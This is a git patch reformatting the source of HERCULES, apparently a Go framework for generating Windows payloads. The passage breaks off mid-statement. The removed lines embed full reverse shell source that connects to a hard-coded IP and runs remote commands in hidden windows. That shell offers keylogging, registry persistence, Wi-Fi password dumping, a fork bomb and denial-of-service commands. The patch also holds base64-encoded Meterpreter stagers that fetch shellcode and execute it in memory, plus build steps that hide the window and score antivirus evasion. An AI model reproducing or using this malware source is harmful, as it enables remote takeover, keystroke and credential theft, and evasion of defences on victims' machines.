From 2b9959de79272b016d8edbfff9b5e60a18aea353 Mon Sep 17 00:00:00 2001 From: Raniere Medeiros Date: Wed, 31 Jan 2018 10:50:17 -0300 Subject: [PATCH] SOURCE,Setup: standardizing the code with gofmt. --- SOURCE/HERCULES.go | 1655 ++++++++--------- SOURCE/Payloads/HERCULES REVERSE SHELL.go | 186 +- .../Meterpreter_Reverse_HTTP_HTTPS.go | 45 +- SOURCE/Payloads/Meterpreter_Reverse_TCP.go | 12 +- Setup.go | 312 ++-- 5 files changed, 1063 insertions(+), 1147 deletions(-) diff --git a/SOURCE/HERCULES.go b/SOURCE/HERCULES.go index 3341d81..5953d04 100644 --- a/SOURCE/HERCULES.go +++ b/SOURCE/HERCULES.go @@ -1,849 +1,806 @@ -package main - - -import "strings" -import "fmt" -import "os" -import "time" -import "strconv" -import "net/http" -import "io/ioutil" -import "os/exec" -import "encoding/base64" -import "github.com/fatih/color" - - -const VERSION string = "3.0.5" - -var HERCULES_REVERSE_SHELL string = "package main

import "net"
import "os/exec"
import "bufio"
import "strings"
import "syscall"
import "time"
import "EGESPLOIT"



const IP string = "10.10.10.84"
const PORT string = "5555"

const BACKDOOR bool = false;
const EMBEDDED bool = false;
const TIME_DELAY time.Duration = 5;//Second

const B64_BINARY string = "//INSERT-BINARY-HERE//"
const BINARY_NAME string = "winupdt.exe"

var GLOBAL_COMMAND string;
var PARAMETERS string;
var KeyLogs string;



func main() {


  if EMBEDDED == true {
    EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS)
  }


  if BACKDOOR == true {
    EGESPLOIT.Persistence()
  }

  connect, err := net.Dial("tcp", IP+":"+PORT);
  if err != nil {
    time.Sleep(TIME_DELAY*time.Second);
    main();
  };



  Dir, Version, Username, AV := EGESPLOIT.Sysguide()
  SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV)  + "\n\n\n" + string(Dir) + ">")
  connect.Write([]byte(string(SysGuide)));



  for {

    Command, _ := bufio.NewReader(connect).ReadString('\n');
    _Command := string(Command);
    GLOBAL_COMMAND = _Command;



    if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") {
      connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND)));
    }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") {
      Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444"
      Address := string(Temp_Address[1])
      ConType := strings.Split(_Command, " ")
      ConType[1] = strings.TrimPrefix(ConType[1], "--")
      EGESPLOIT.Meterpreter(ConType[1], Address)
      connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">"));
    }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") {
      Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212
      Address := string(Temp_Address[1])
      Pid := strings.Split(_Command, " ")
      Result, Error := EGESPLOIT.Migrate(Pid[2], Address)
      if Result == true {
          connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") {
      DOS_Command := strings.Split(GLOBAL_COMMAND, "\"")
      var DOS_Target string =  DOS_Command[1]
      if strings.Contains(string(DOS_Target), "http") {
        go EGESPLOIT.Dos(DOS_Target);
        connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") {
      EGESPLOIT.Distrackt();
    }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){
      go EGESPLOIT.Keylogger(&KeyLogs);
       connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">")));
    }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){
      Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">");
      connect.Write([]byte(Dump_Output));
    }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") {
      List := EGESPLOIT.WifiList();
      connect.Write([]byte(string(List)));
    }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") {
      connect.Write([]byte(string(HELP+Dir+">")));
    }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") {
      go EGESPLOIT.Persistence();
      connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">"));
    }else{
      cmd := exec.Command("cmd", "/C", _Command);
      cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true};
      out, _ := cmd.Output();
      Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">");
      connect.Write([]byte(Command_Output));
    };
  };
};






var BANNER string = `
                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ############################
`




var HELP string = `

                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ##########################################



~PERSSISTENCE                         Installs a persistence module for continious acces

~DISTRACT                             Executes a fork bomb bat file for distraction

~PLEASE                               Asks users comfirmation for higher privilidge operations

~DOS -A "www.targetsite.com"          Starts a denial of service atack

~WIFI-LIST 						                Dumps all wifi history data with passwords

~METERPRETER --http "10.0.0.1:4444"   Creates a meterpreter connection to metasploit (http/https/tcp)

~KEYLOGGER-DEPLOY                     Installs a keylogger module and logs all keystrokes

~KEYLOGGER-DUMP                       Dumps all loged keystrokes

~MIGRATE "10.0.0.1:4444" 2222         Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)


###############################################################################################

`
" -var METERPRETER_TCP string = "cGFja2FnZSBtYWluCgoKaW1wb3J0ICJlbmNvZGluZy9iaW5hcnkiCmltcG9ydCAic3lzY2FsbCIKaW1wb3J0ICJ1bnNhZmUiCi8vaW1wb3J0ICJFR0VTUExPSVQvUlNFIgoKY29uc3QgTUVNX0NPTU1JVCAgPSAweDEwMDAKY29uc3QgTUVNX1JFU0VSVkUgPSAweDIwMDAKY29uc3QgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUgID0gMHg0MAoKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKCgpmdW5jIEFsbG9jYXRlKFNoZWxsY29kZSB1aW50cHRyKSAodWludHB0cikgewoKCUFkZHIsIF8sIF8gOj0gVmlydHVhbEFsbG9jLkNhbGwoMCwgU2hlbGxjb2RlLCBNRU1fUkVTRVJWRXxNRU1fQ09NTUlULCBQQUdFX0FsbG9jYXRlVVRFX1JFQURXUklURSkKCWlmIEFkZHIgPT0gMCB7CgkJbWFpbigpCgl9CglyZXR1cm4gQWRkcgp9CgpmdW5jIG1haW4oKSB7CgkvL1JTRS5QZXJzaXN0ZW5jZSgpCgl2YXIgV1NBX0RhdGEgc3lzY2FsbC5XU0FEYXRhCglzeXNjYWxsLldTQVN0YXJ0dXAodWludDMyKDB4MjAyKSwgJldTQV9EYXRhKQoJU29ja2V0LCBfIDo9IHN5c2NhbGwuU29ja2V0KHN5c2NhbGwuQUZfSU5FVCwgc3lzY2FsbC5TT0NLX1NUUkVBTSwgMCkKCVNvY2tldF9BZGRyIDo9IHN5c2NhbGwuU29ja2FkZHJJbmV0NHtQb3J0OiA1NTU1LCBBZGRyOiBbNF1ieXRlezEyNywwLDAsMX19CglzeXNjYWxsLkNvbm5lY3QoU29ja2V0LCAmU29ja2V0X0FkZHIpCgl2YXIgTGVuZ3RoIFs0XWJ5dGUKCVdTQV9CdWZmZXIgOj0gc3lzY2FsbC5XU0FCdWZ7TGVuOiB1aW50MzIoNCksIEJ1ZjogJkxlbmd0aFswXX0KCVVpdG5aZXJvXzEgOj0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgOj0gdWludDMyKDApCglzeXNjYWxsLldTQVJlY3YoU29ja2V0LCAmV1NBX0J1ZmZlciwgMSwgJkRhdGFSZWNlaXZlZCwgJlVpdG5aZXJvXzEsIG5pbCwgbmlsKQoJTGVuZ3RoX2ludCA6PSBiaW5hcnkuTGl0dGxlRW5kaWFuLlVpbnQzMihMZW5ndGhbOl0pCglpZiBMZW5ndGhfaW50IDwgMTAwIHsKCQltYWluKCkKCX0KCVNoZWxsY29kZV9CdWZmZXIgOj0gbWFrZShbXWJ5dGUsIExlbmd0aF9pbnQpCgoJdmFyIFNoZWxsY29kZSBbXWJ5dGUKCVdTQV9CdWZmZXIgPSBzeXNjYWxsLldTQUJ1ZntMZW46IExlbmd0aF9pbnQsIEJ1ZjogJlNoZWxsY29kZV9CdWZmZXJbMF19CglVaXRuWmVyb18xID0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgPSB1aW50MzIoMCkKCVRvdGFsRGF0YVJlY2VpdmVkIDo9IHVpbnQzMigwKQoJZm9yIFRvdGFsRGF0YVJlY2VpdmVkIDwgTGVuZ3RoX2ludCB7CgkJc3lzY2FsbC5XU0FSZWN2KFNvY2tldCwgJldTQV9CdWZmZXIsIDEsICZEYXRhUmVjZWl2ZWQsICZVaXRuWmVyb18xLCBuaWwsIG5pbCkKCQlmb3IgaSA6PSAwOyBpIDwgaW50KERhdGFSZWNlaXZlZCk7IGkrKyB7CgkJCVNoZWxsY29kZSA9IGFwcGVuZChTaGVsbGNvZGUsIFNoZWxsY29kZV9CdWZmZXJbaV0pCgkJfQoJCVRvdGFsRGF0YVJlY2VpdmVkICs9IERhdGFSZWNlaXZlZAoJfQoKCUFkZHIgOj0gQWxsb2NhdGUodWludHB0cihMZW5ndGhfaW50ICsgNSkpCglBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKCVNvY2tldFB0ciA6PSAodWludHB0cikodW5zYWZlLlBvaW50ZXIoU29ja2V0KSkKCUFkZHJQdHJbMF0gPSAweEJGCglBZGRyUHRyWzFdID0gYnl0ZShTb2NrZXRQdHIpCglBZGRyUHRyWzJdID0gMHgwMAoJQWRkclB0clszXSA9IDB4MDAKCUFkZHJQdHJbNF0gPSAweDAwCglmb3IgQnB1QUtySnhmbCwgSUluZ2FjTWFCaCA6PSByYW5nZSBTaGVsbGNvZGUgewoJCUFkZHJQdHJbQnB1QUtySnhmbCs1XSA9IElJbmdhY01hQmgKCX0KCS8vUlNFLk1pZ3JhdGUoQWRkciwgaW50KExlbmd0aF9pbnQpKQoJc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCn0KCi8qCgoxLiBDcmVhdGUgV1NBIERBVEEgdmVyc2lvbiAyLjIKMi4gQ3JlYXRlIGEgV1NBIFNvY2tldAozLiBDcmVhdGUgV1NBIFNvY2tldCBBZGRyZXNzIG9iamVjdAo0LiBDb25uZWN0CjUuIENyZWF0ZSA0IGJ5dGUgc2Vjb25kIHN0YWdlIGxlbmd0aCBhcnJheQo2LiBDcmVhdGUgYSBXU0EgQnVmZmVyIG9iamVjdCBwb2ludGluZyBzZWNvbmQgc3RhZ2UgbGVuZ3RoIGFycmF5CjcuIFJlY2VpdmUgNCBieXRlcyBXU0FSZWN2IHRvIHNlY29uZCBzdGFnZSBsZW5ndGggYXJyYXkKOC4gQ29udmVydCBzZWNvbmQgc3RhZ2UgbGVuZ3RoIHRvIGludAo5LiBDcmVhdGUgYSBieXRlIGFycmF5IGF0IHRoZSBzaXplIG9mIHNlY29uZCBzdGFnZSBieXRlIGFycmF5IGZvciBzZWNvbmQgc3RhZ2Ugc2hlbGxjb2RlCjEwLiBDcmVhdGUgYSB1bmRlZmluZWQgYnl0ZSBhcnJheQoxMS4gQ3JlYXRlIGFub3RoZXIgV1NBIGJ1ZmZlciBvYmplY3QgcG9pbnRpbmcgYXQgc2Vjb25kIHN0YWdlIHNoZWxsY29kZSBieXRlIGFycmF5CjEyLiBDb25zdHJ1Y3QgYSBuZXN0ZWQgZm9yIGxvb3AgdGhhdCByZWNlaXZlcyBieXRlcyBhbmQgYXBwZW5kcyB0aGVtIGludG8gdW5kZWZpbmVkIGJ5dGUgYXJyYXkKMTMuIEFsbG9jYXRlIHNwYWNlIGluIG1lbW9yeSBhdCB0aGUgc2l6ZSBvZiAoc2Vjb25kIHN0YWdlIHNoZWxsY29kZSArIDUpCjE0LiBDcmVhdGUgYSBwb2ludGVyIHRoYXQgcG9pbnRzIHRvIFdTQSBTb2NrZXQKMTUuIEFzc2luZyAweEJGKG1vdiBlZGkpIHRvIGZpc3QgYnl0ZSBvZiBhbGxvY2F0ZWQgbWVtb3J5CjE2LiBBc3NpbmcgV1NBIFNvY2tldCBwb2ludGVyIHRvIHNlY29uZCBieXRlIG9mIGFsbG9jYXRlZCBtZW1vcnkKMTcuIEFzc2luZyB0cmVlIG51bGwgYnl0ZXMgYWZ0ZXIgc2Vjb25kIGJ5dGUgb2YgYWxsb2NhdGVkIG1lbW9yeQoxOC4gTW92ZSBzaGVsbGNvZGUgYnl0ZXMgdG8gYWxsb2NhdGVkIG1lbW9yeSBzdGFydGluZyBhdCBmaWZ0IGJ5dGUKMTkuIE1ha2UgYSBzeXNjYWxsIHRvIGFsbG9jYXRlZCBtZW1vcnkgYWRkcmVzcwoqLwo=" -var METERPRETER_HTTP_HTTPS string = "cGFja2FnZSBtYWluCgppbXBvcnQgIm5ldC9odHRwIgppbXBvcnQgInN5c2NhbGwiCmltcG9ydCAidW5zYWZlIgppbXBvcnQgImlvL2lvdXRpbCIKLy9pbXBvcnQgIkVHRVNQTE9JVC9SU0UiCgoKCmNvbnN0IE1FTV9DT01NSVQgID0gMHgxMDAwCmNvbnN0IE1FTV9SRVNFUlZFID0gMHgyMDAwCmNvbnN0IFBBR0VfQWxsb2NhdGVVVEVfUkVBRFdSSVRFICA9IDB4NDAKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKdmFyIEFkZHJlc3Mgc3RyaW5nID0gImh0dHA6Ly8xMjcuMC4wLjE6ODA4MC8iCnZhciBDaGVja3N1bSBzdHJpbmcgPSAiMTAyMDExYjd0eHBsNzFuIgoKCgpmdW5jIG1haW4oKSB7CiAgLy9SU0UuUGVyc2lzdGVuY2UoKQogIEFkZHJlc3MgKz0gQ2hlY2tzdW0KICBSZXNwb25zZSwgZXJyIDo9IGh0dHAuR2V0KEFkZHJlc3MpCiAgaWYgZXJyICE9IG5pbCB7CiAgICBtYWluKCkKICB9CiAgU2hlbGxjb2RlLCBfIDo9IGlvdXRpbC5SZWFkQWxsKFJlc3BvbnNlLkJvZHkpCgogIEFkZHIsIF8sIGVyciA6PSBWaXJ0dWFsQWxsb2MuQ2FsbCgwLCB1aW50cHRyKGxlbihTaGVsbGNvZGUpKSwgTUVNX1JFU0VSVkV8TUVNX0NPTU1JVCwgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUpCiAgaWYgQWRkciA9PSAwIHsKICAgIG1haW4oKQogIH0KICBBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKICBmb3IgaSA6PSAwOyBpIDwgbGVuKFNoZWxsY29kZSk7IGkrKyB7CiAgICBBZGRyUHRyW2ldID0gU2hlbGxjb2RlW2ldCiAgfQogIC8vUlNFLk1pZ3JhdGUoQWRkciwgbGVuKFNoZWxsY29kZSkpCiAgc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCgp9Cg==" - -type PAYLOAD struct { - Ip string - Port string - Type int - Size string - UPX_Size string - MidSize string - FullSize string - Score float32 - FileName string - SourceCode string - Persistence bool - Migrate bool - BypassAV bool - UPX bool - -} - -var Payload PAYLOAD -var MenuSelection int -var Ask string -var NO int - - - -func main() { - - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - Red := color.New(color.FgRed) - BoldRed := Red.Add(color.Bold) - - - Result := CheckSetup() - - if Result == false { - ClearScreen() - PrintBanner() - PrintCredit() - - BoldRed.Println("\n\n[!] HERCULES is not installed properly, please run setup.sh") - - os.Exit(1) - - } - - ClearScreen() - PrintBanner() - PrintCredit() - Menu_1() - - fmt.Scan(&MenuSelection) - - ClearScreen() - - if MenuSelection == 1 { - PrintBanner() - PrintPayloads() - fmt.Print("\n\n[*] Select : ") - fmt.Scan(&NO) - PreparePayload(NO) - - fmt.Print("\n\n[*] Enter the base name for output files : ") - fmt.Scan(&Payload.FileName) - CompilePayload() - AskUPX() - FinalView() - }else if MenuSelection == 2 { - ClearScreen() - PrintBanner() - PrintCredit() - BoldRed.Println("\n\n[!] Bind payload option will be added at next version...") - time.Sleep(3*time.Second) - main() - }else if MenuSelection == 3 { - ClearScreen() - PrintBanner() - PrintCredit() - fmt.Println("\n\n") - Result := ChecVersion() - if strings.Contains(Result, "[!]") { - BoldRed.Println(Result) - if Result == "[!] New version detected" { - BoldYellow.Print("\nDo you want to upgrade ? (y/n) : ") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y" { - Update := exec.Command("sh", "-c", "chmod 777 Update && sudo ./Update") - Update.Stdout = os.Stdout - Update.Stderr = os.Stderr - Update.Start() - }else{ - main() - } - } - }else{ - BoldGreen.Println(Result) - time.Sleep(3*time.Second) - main() - } - }else{ - main() - } - - -} - -func CheckSetup() (bool){ - - DirList, _ := exec.Command("sh", "-c", "cd $HERCULES_PATH/src && ls").Output() - GoVer, _ := exec.Command("sh", "-c", "go version").Output() - UPX, _ := exec.Command("sh", "-c", "upx").Output() - - if (!(strings.Contains(string(DirList), "EGESPLOIT"))) { - return false - } - - if !(strings.Contains(string(GoVer), "version")) { - return false - } - if !(strings.Contains(string(UPX), "Markus")) { - return false - } - return true -} - - -func ChecVersion() (string){ - - Response, Error := http.Get("https://raw.githubusercontent.com/EgeBalci/HERCULES/master/SOURCE/HERCULES.go") - if Error != nil { - return "[!] ERROR : Connection attempt failed" - } - Body, _ := ioutil.ReadAll(Response.Body) - - Version := string(`"`+VERSION+`"`) - - if !(strings.Contains(string(Body), Version)) { - return "[!] New version detected" - }else{ - return "[+] HERCULES is up to date" - } - -} - - -func PrintBanner() { - color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") - color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") - color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") - color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") - color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") - color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") - color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") - color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") - color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") - color.Red(" ░ ") - -} - -func PrintCredit() { - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") - color.Green("+ -- --=[ Version: "+VERSION+" ]") - BoldGreen.Println("+ -- --=[ Ege Balcı ]") -} - - -func Menu_1() { - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - White := color.New(color.FgWhite) - UnderlinedWhite := White.Add(color.Underline) - BoldYellow.Println("\n[1] GENERATE PAYLOAD ") - BoldYellow.Println("\n[2] BIND PAYLOAD ") - BoldYellow.Println("\n[3] UPDATE ") - - UnderlinedWhite.Print("\n\n[*] Select : ") -} - -func PrintPayloads() { - - White := color.New(color.FgWhite) - BoldWhite := White.Add(color.Bold) - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - - - fmt.Println("\n") - BoldWhite.Println(" #===============================================================================#") - BoldWhite.Println(" | PAYLOAD | SIZE/UPX | AV Evasion Score |") - BoldWhite.Println(" |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~|") - BoldWhite.Print("(1) Meterpreter Reverse TCP | 946 KB / 262 KB | ") - BoldGreen.Print(" 8/10 ") - BoldWhite.Println("|") - BoldWhite.Println(" | | | |") - BoldWhite.Print("(2) Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") - BoldGreen.Print(" 8/10 ") - BoldWhite.Println("|") - BoldWhite.Println(" | | | |") - BoldWhite.Print("(3) Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") - BoldGreen.Print(" 8/10 ") - BoldWhite.Println("|") - BoldWhite.Println(" | | | |") - BoldWhite.Print("(4) HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") - BoldGreen.Print("7/10 ") - BoldWhite.Println("|") - BoldWhite.Println(" | | | |") - BoldWhite.Println(" #===============================================================================#") - fmt.Println("\n") -} - - -func FinalView() { - Cyan := color.New(color.FgCyan) - BoldCyan := Cyan.Add(color.Bold) - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - Blue := color.New(color.FgBlue) - BoldBlue := Blue.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - Red := color.New(color.FgRed) - BoldRed := Red.Add(color.Bold) - White := color.New(color.FgWhite) - BoldWhite := White.Add(color.Bold) - ClearScreen() - PrintBanner() - - if Payload.Type == 1 { - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") - if Payload.Score < 5 { - BoldRed.Print(Payload.Score) - }else if Payload.Score == 5 { - BoldYellow.Print(Payload.Score) - }else { - BoldGreen.Print(Payload.Score) - } - if Payload.Score == 10 { - BoldGreen.Print("/10 ") - }else{ - BoldGreen.Print("/10 ") - } - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - }else if Payload.Type == 2 { - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") - if Payload.Score < 5 { - BoldRed.Print(Payload.Score) - }else if Payload.Score == 5 { - BoldYellow.Print(Payload.Score) - }else { - BoldGreen.Print(Payload.Score) - } - if Payload.Score == 10 { - BoldGreen.Print("/10 ") - }else{ - BoldGreen.Print("/10 ") - } - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - }else if Payload.Type == 3 { - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") - if Payload.Score < 5 { - BoldRed.Print(Payload.Score) - }else if Payload.Score == 5 { - BoldYellow.Print(Payload.Score) - }else { - BoldGreen.Print(Payload.Score) - } - if Payload.Score == 10 { - BoldGreen.Print("/10 ") - }else{ - BoldGreen.Print("/10 ") - } - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - }else if Payload.Type == 4 { - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") - if Payload.Score < 5 { - BoldRed.Print(Payload.Score) - }else if Payload.Score == 5 { - BoldYellow.Print(Payload.Score) - }else { - BoldGreen.Print(Payload.Score) - } - if Payload.Score == 10 { - BoldGreen.Print("/10 ") - }else{ - BoldGreen.Print("/10 ") - } - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - } - - - if Payload.Persistence == true { - BoldCyan.Print("\n[*] Persistence : ON") - BoldWhite.Print(" (") - BoldRed.Print("-2") - BoldWhite.Println(")") - } - if Payload.Migrate == true { - BoldCyan.Print("\n[*] Migration : ON") - BoldWhite.Print(" (") - BoldRed.Print("-1") - BoldWhite.Println(")") - } - - if Payload.UPX == true { - BoldCyan.Print("\n[*] UPX : ON") - BoldWhite.Print(" (") - BoldRed.Print("-3") - BoldWhite.Println(")") - } - - - if Payload.Type == 1 { - if Payload.UPX == true && (Payload.Persistence || Payload.Migrate ){ - BoldCyan.Println("\n[*] Payload Size : 326 KB") - }else if Payload.UPX == true && !(Payload.Persistence || Payload.Migrate) { - BoldCyan.Println("\n[*] Payload Size : 262 KB") - }else if Payload.UPX == false && !(Payload.Persistence || Payload.Migrate ) { - BoldCyan.Println("\n[*] Payload Size : 946 KB") - } - - }else{ - if Payload.UPX == true { - BoldCyan.Println("\n[*] Payload Size : " + Payload.UPX_Size) - }else{ - BoldCyan.Println("\n[*] Payload Size : " + Payload.Size) - } - } - - - PayloadName := strings.TrimSuffix(Payload.FileName, ".go") - - PayloadName += ".exe" - - BoldCyan.Println("\n[*] Payload saved at : /$HOME/" + PayloadName + "\n\n") - - -} - - -func CompilePayload() { - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - - Payload.FileName += ".go" - - File, _ := os.Create(Payload.FileName) - Source, _ := base64.StdEncoding.DecodeString(Payload.SourceCode) - var SourceCode string - - if Payload.Type == 2 || Payload.Type == 3 { - Address := string("\"http://" + Payload.Ip + ":" + Payload.Port + "/\"") - SourceCode = strings.Replace(string(Source), string("\"http://127.0.0.1:8080/\""), string(Address), -1) - if Payload.BypassAV == true { - SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) - SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) - } - if Payload.Persistence == true { - SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", `import "EGESPLOIT/RSE"`, -1) - SourceCode = strings.Replace(string(SourceCode), "//RSE.Persistence()", "RSE.Persistence()", -1) - } - if Payload.Migrate == true { - SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) - SourceCode = strings.Replace(string(SourceCode), "//RSE.Migrate(Addr, len(Shellcode))", "RSE.Migrate(Addr, len(Shellcode))", -1) - } - - - File.WriteString(SourceCode) - - BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) - BoldYellow.Println("\n[*] Compiling payload...") - BoldYellow.Println("\n[*] " + BuildCommand_Args) - BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) - BuildCommand.Stdout = os.Stdout - BuildCommand.Stderr = os.Stderr - BuildCommand.Run() - CleanFilesCommand := string("rm " + Payload.FileName) - exec.Command("sh", "-c", CleanFilesCommand).Run() - DirFiles, _ := exec.Command("sh", "-c", "ls").Output() - FileName_No_Suffix := 